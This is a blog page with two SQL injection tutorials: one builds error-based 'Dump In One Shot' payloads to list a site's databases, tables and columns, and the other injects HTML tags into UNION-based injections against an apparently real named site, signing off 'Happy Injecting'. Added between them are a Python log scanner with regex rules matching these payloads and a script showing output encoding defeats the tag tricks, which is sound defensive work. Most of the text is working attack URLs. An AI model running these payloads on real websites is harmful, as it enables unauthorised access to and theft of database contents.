Articles by "SQL"



Error Based Dump In One Shot (DIOS) 

We discussed error-based SQL injection in our previous tutorial.
In this tutorial you will learn how to build an error-based Dump In One Shot (DIOS) query.
As we know, in an error-based query we send our commands to the server and it returns the result inside an error message.



If we want to get version(), we send a query like this.


http://www.FakeSite.com/news.php?id=11 or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1-- -
 

We get the version printed on the page: version=5.5.42-cll



Now let's get the primary database name.
http://www.FakeSite.com/news.php?id=11 and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- -

And here is our primary database.

The primary database name is "kkbaketo_wordpress". If we want to get the others, we usually increase LIMIT 0,1 to LIMIT 1,1.

But we can also get all databases without using LIMIT.
Here is our syntax for getting all databases.

(SELECT!x-~0.FROM(SELECT(concat(0x3a3a3a,(select group_concat(schema_name) from information_schema.schemata)))x)a)

Now add this syntax to get all databases.

http://www.FakeSite.com/news.php?id=(SELECT!x-~0.FROM(SELECT(concat(0x3a3a3a,(select group_concat(schema_name) from information_schema.schemata)))x)a)-- -


And these are our databases.

information_schema,kkbaketo_wordpress

The next step is to get the tables.
Here is the example.
http://www.FakeSite.com/news.php?id=11 or 1 group by concat_ws(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2)) having min(0) or 1-- -
And we get the table name in the error response:

We just got one table name: kkbaketop_category

That was our first table name. We can get the next one, and then another, by increasing the value of LIMIT 0,1 to LIMIT 2,1, LIMIT 3,1.
We increase the LIMIT for tables:
LIMIT 0,1 for the 1st table.
LIMIT 1,1 for the 2nd table.
As we know, we can dump all tables and columns in a UNION-based injection.
In an error-based Dump In One Shot (DIOS) we cannot dump all tables/columns as we can in a UNION-based injection.
But we can get some tables/columns from the database by building our query.


Here is our syntax for tables.

(select group_concat(table_name) from information_schema.tables where table_schema=database())

Now add this syntax to our DIOS query.

(SELECT!x-~0./*!50000FROM*/(/*!50000SELECT*/(/*!50000concat_ws*/(0x3a3a3a,(select group_concat(table_name) from information_schema.tables where table_schema=database())))x)a)


Our DIOS query is ready for tables.



http://www.FakeSite.com/news.php?id=(SELECT!x-~0./*!50000FROM*/(/*!50000SELECT*/(/*!50000concat_ws*/(0x3a3a3a,(select group_concat(table_name) from information_schema.tables where table_schema=database())))x)a)-- -


Here are our tables.

kkbaketop_admin,kkbaketop_category,kkbaketop_content,kkbaketop_contentOld,kkbaketop_meta,kkbaketop_navigation,kkbaketop_product

We can also use an HTML tag to show each table on a new line.
HTML tag = <BR>
We can use it by encoding it as a hex value or by putting single quotes before and after the HTML tag.
Hex value = 3c42523e; we have to put 0x before the hex value to use the HTML tag.
Hex value = 0x3c42523e
With single quotes = '<BR>'

Put the HTML tag before the table_name.
Now let's add this tag to our error-based DIOS query and execute it.

http://www.FakeSite.com/news.php?id=(SELECT!x-~0./*!50000FROM*/(/*!50000SELECT*/(/*!50000concat_ws*/(0x3a3a3a,(select group_concat('<BR>',table_name) from information_schema.tables where table_schema=database())))x)a)-- -
Now all tables are on new lines.

The next step is to get the columns.

Here is the syntax for columns.

(select group_concat(0x3c42523e,table_name,0x3a,column_name) from information_schema.columns  where table_schema=database())

Add this syntax to the DIOS query and execute it to get the columns from each table.


And here is the final error-based DIOS query for getting tables and columns in one shot.


http://www.FakeSite.com/news.php?id=(SELECT!x-~0./*!50000FROM*/(/*!50000SELECT*/(/*!50000concat_ws*/(0x3a3a3a,(select group_concat('<BR>',table_name,0x3a,column_name) from information_schema.columns where table_schema=database())))x)a)-- -


You can see the tables and columns printed in the screenshot.

Hope you like the tutorial.

Source: ECA Team
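
The payload shapes used in this tutorial leave recognizable traces in web server access logs. The following is an added example, not part of the original post: a log scanner that decodes each query string, unwraps MySQL versioned comments such as /*!50000FROM*/, and flags the constructs shown above. The rule names, log lines and client addresses are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Rules built from this tutorial's payload shapes; names are made up for the
# example, and every pattern in a tuple must match for the rule to fire.
RULES = {
    "dup_key_error": (r"\bgroup\s+by\b", r"floor\(\s*rand\(\s*0\s*\)\s*\*\s*2\s*\)"),
    "bigint_overflow": (r"!\s*\w+\s*-\s*~\s*0",),
    "schema_enum": (r"information_schema\s*\.\s*(schemata|tables|columns)",),
}

def decode(query):
    """URL-decode three times so nested encoding cannot hide a payload."""
    for _ in range(3):
        query = unquote_plus(query)
    return query.lower()

def strip_comments(text):
    """Unwrap /*!50000FROM*/ to FROM (MySQL executes the body), drop other comments."""
    text = re.sub(r"/\*!\d*(.*?)\*/", r" \1 ", text, flags=re.S)
    text = re.sub(r"/\*.*?\*/", " ", text, flags=re.S)
    return re.sub(r"\s+", " ", text)

def classify(query):
    """Return the sorted names of every rule that matches one query string."""
    decoded = decode(query)
    text = strip_comments(decoded)
    hits = {n for n, pats in RULES.items() if all(re.search(p, text) for p in pats)}
    return sorted(hits | ({"versioned_comment"} if "/*!" in decoded else set()))

def scan(log_lines):
    """Yield (client, rules) for access-log lines whose query string matches."""
    for line in log_lines:
        m = re.match(r'(\S+) .*?"[A-Z]+ [^ ?"]*\?([^ "]*) HTTP/', line)
        rules = classify(m.group(2)) if m else []
        if rules:
            yield m.group(1), rules

# Constructed access-log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '198.51.100.4 - - [01/Jan/2024:10:00:00 +0000] "GET /news.php?id=11 HTTP/1.1" 200 5120',
    '198.51.100.4 - - [01/Jan/2024:10:00:05 +0000] "GET /search.php?q=group+by+examples HTTP/1.1" 200 2048',
    '203.0.113.7 - - [01/Jan/2024:10:01:02 +0000] "GET /news.php?id=11+or+1+group+by+concat_ws(0x3a,version(),floor(rand(0)*2))+having+min(0)+or+1--+- HTTP/1.1" 200 731',
    '203.0.113.7 - - [01/Jan/2024:10:01:10 +0000] "GET /news.php?id=(SELECT!x-~0.%2F*!50000FROM*%2F(%2F*!50000SELECT*%2F(%2F*!50000concat_ws*%2F(0x3a3a3a,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database())))x)a)--%20- HTTP/1.1" 200 912',
]

if __name__ == "__main__":
    for client, rules in scan(SAMPLE_LOG):
        print(client, rules)
```

Signature matches are a triage aid only; the fix on the application side is to bind id as a query parameter and to stop returning database error text to the client.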

Kaizen

HTML tags can be used for a lot of fun in SQL queries. We can use HTML tags to make the output colorful. Sometimes we inject a site and the vulnerable column is in the title or in the page source, so we can also use HTML tags there to display the output on the page.
So we will start by adding HTML tags to make the output colorful.
Here is an example. We want to print the version in red, so here is our HTML tag for displaying the version in red.
 <font color=red>

Concat(OUR_HTML_TAG,QUERY_HERE)

Let's look at the result. Before executing the query, first encode the HTML tag as a hex value, or put single quotes before and after the HTML tag, to make it executable.

http://www.kimclement.com/basiccal/event.php
?id=-444' UNION SELECT 1,2,3,4,5,6,Concat('<font color=red>',version()),8,9--+



Adding HTML Tags in SQL Queries

And you can see the version in red. If we want to use different colors for each command, such as displaying the version in red, the database in green and the user in blue, we use a different HTML tag for each task.

See the example:
Concat(Version RED Color ,Database in Green Color,User in Blue Color)
HTML Tags For Each Task:
Red color: <font color=red>
Green Color: <font color=green>
Blue Color: <font color=blue>

So our final query for displaying each task in a different color will be:

Concat(<font color=red>,version(),<font color=green>,database(),<font color=blue>,user())

Example:
http://www.kimclement.com/basiccal/event.php
?id=-444' UNION SELECT 1,2,3,4,5,6,Concat('<font color=red>',version(),0x3a,'<font color=green>',database(),0x3a,'<font color=blue>',user()),8,9--+




And see in the image that all tasks are complete. In this way you can also display tables and columns in different colors.
After displaying the SQLi commands in different colors, let's now see how we can display data when our vulnerable column is in the page source or in the TITLE, using HTML tags.

When the vulnerable column is in the page source:
Concat(STARTING_HTML_TAG,OUR_QUERY,ENDING_HTML_TAG)

So we will use this HTML tag to display the data on the page if our vulnerable column is in the page source.

HTML TAG:Concat(<font size="8" color="red">,Version(),</font>) 

And sometimes our vulnerable column is in the title, so in that case we will use this HTML tag to print the data on the web page.

HTML TAG:Concat(</title>,Version())

Use this HTML tag after encoding it as a hex value, or after putting single quotes before and after the HTML tag, to make the query executable.

Happy Injecting :)

Zaenal Arifin
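
The tag tricks in this post depend on the application writing database values into the page without HTML-encoding them. The following is an added example, not from the original post (the template, the function names and the row value are hypothetical): it renders the same value raw and encoded, then checks which tags a parser actually sees.

```python
from html import escape
from html.parser import HTMLParser

# Hypothetical page template: one database value lands in <title> and in <h1>.
TEMPLATE = ("<html><head><title>{v}</title></head>"
            "<body><h1>{v}</h1></body></html>")

# Constructed column value shaped like the post's Concat(tag, version()) output.
ROW_VALUE = '</title><font size="8" color="red">5.5.42-cll</font>'

def render_raw(value):
    """Vulnerable: the value is written into the markup unchanged."""
    return TEMPLATE.format(v=value)

def render_encoded(value):
    """Hardened: <, >, & and quotes become entities, so the value stays text."""
    return TEMPLATE.format(v=escape(value, quote=True))

class TagCollector(HTMLParser):
    """Records every start tag the parser recognizes."""
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)

def start_tags(html):
    """Return the start tags a parser sees, in document order."""
    collector = TagCollector()
    collector.feed(html)
    collector.close()
    return collector.tags

def unexpected_tags(html, allowed=("html", "head", "title", "body", "h1")):
    """Tags outside the template's own set mean a value was parsed as markup."""
    return [t for t in start_tags(html) if t not in allowed]

if __name__ == "__main__":
    print("raw:", unexpected_tags(render_raw(ROW_VALUE)))
    print("encoded:", unexpected_tags(render_encoded(ROW_VALUE)))
```

The same structural check can run in a regression test over rendered pages, so that a template which stops encoding a database field fails the build.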
